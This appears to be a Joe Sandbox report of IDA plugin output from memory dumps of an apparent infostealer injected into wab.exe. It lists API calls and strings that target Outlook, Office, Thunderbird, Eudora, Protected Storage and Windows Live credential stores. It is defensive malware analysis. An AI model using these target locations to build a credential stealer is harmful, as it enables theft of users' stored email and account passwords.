                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 764393265-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 979780441-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InvalidateMessageRectSend
                                                                                                                                                                                          • String ID: d=E
                                                                                                                                                                                          • API String ID: 909852535-3703654223
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                          • String ID: URL
                                                                                                                                                                                          • API String ID: 2108176848-3574463123
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                          • String ID: F^@
                                                                                                                                                                                          • API String ID: 568519121-3652327722
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                                                                                          • String ID: WinPos
                                                                                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 231171946-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1961120804-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:2.6%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:20.4%
                                                                                                                                                                                          Signature Coverage:0.5%
                                                                                                                                                                                          Total number of Nodes:845
                                                                                                                                                                                          Total number of Limit Nodes:17

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 129 408043-40818c memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 4081c2-4081c5 129->130 131 40818e 129->131 133 4081f6-4081fa 130->133 134 4081c7-4081d0 130->134 132 408194-40819d 131->132 135 4081a4-4081c0 132->135 136 40819f-4081a3 132->136 137 4081d2-4081d6 134->137 138 4081d7-4081f4 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004080A5
                                                                                                                                                                                          • memset.MSVCRT ref: 004080B9
                                                                                                                                                                                          • memset.MSVCRT ref: 004080D3
                                                                                                                                                                                          • memset.MSVCRT ref: 004080E8
                                                                                                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                          • API String ID: 1832431107-3760989150
                                                                                                                                                                                          • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                          • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                          • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 432 407c87-407c90 433 407c92-407cb1 FindFirstFileA 432->433 434 407cb3-407cc7 FindNextFileA 432->434 437 407cce-407cd3 433->437 435 407cd5-407d03 strlen * 2 434->435 436 407cc9 call 407d1f 434->436 440 407d12 435->440 441 407d05-407d10 call 406e81 435->441 436->437 437->435 439 407d18-407d1e 437->439 443 407d15-407d17 440->443 441->443 443->439
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
                                                                                                                                                                                          • strlen.MSVCRT ref: 00407CEB
                                                                                                                                                                                          • strlen.MSVCRT ref: 00407CF3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                          • API String ID: 379999529-2881260426
                                                                                                                                                                                          • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                          • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00401E82
                                                                                                                                                                                          • strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                          • strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                          • memset.MSVCRT ref: 00401FA8
                                                                                                                                                                                          • atoi.MSVCRT ref: 00401FD7
                                                                                                                                                                                          • memset.MSVCRT ref: 00401FFA
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402027
                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                          • memset.MSVCRT ref: 0040207D
                                                                                                                                                                                          • memset.MSVCRT ref: 00402092
                                                                                                                                                                                          • strlen.MSVCRT ref: 00402098
                                                                                                                                                                                          • strlen.MSVCRT ref: 004020A6
                                                                                                                                                                                          • strlen.MSVCRT ref: 004020D9
                                                                                                                                                                                          • strlen.MSVCRT ref: 004020E7
                                                                                                                                                                                          • memset.MSVCRT ref: 0040200F
                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040216E
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402178
                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
                                                                                                                                                                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                          • API String ID: 1846531875-4223776976
                                                                                                                                                                                          • Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                          • Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                            • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                            • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                            • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040CEC8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                          • API String ID: 745651260-375988210
                                                                                                                                                                                          • Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                          • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403E41
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                                                                                                                                                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                                                                                                                                                                          • pstorec.dll, xrefs: 00403C1D
                                                                                                                                                                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                                                                                                                                                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                                                                                                                                                                          • PStoreCreateInstance, xrefs: 00403C31
                                                                                                                                                                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                                                                                                                                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                                                                                                                                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                                                                                                                                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                                                                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                                                                                                                                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                          • API String ID: 1197458902-317895162
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 231 40f478-40f4ad call 4446d0 RegOpenKeyExA 234 40f4b3-40f4c7 RegOpenKeyExA 231->234 235 40f5af-40f5b5 231->235 236 40f5a5-40f5a9 RegCloseKey 234->236 237 40f4cd-40f4f6 RegQueryValueExA 234->237 236->235 238 40f59b-40f59f RegCloseKey 237->238 239 40f4fc-40f50b call 40472f 237->239 238->236 239->238 242 40f511-40f549 call 4047a0 239->242 242->238 245 40f54b-40f553 242->245 246 40f591-40f595 LocalFree 245->246 247 40f555-40f58c memcpy * 2 call 40f177 245->247 246->238 247->246
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F55C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F571
                                                                                                                                                                                            • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                            • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                            • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                            • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                          • API String ID: 2768085393-888555734
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

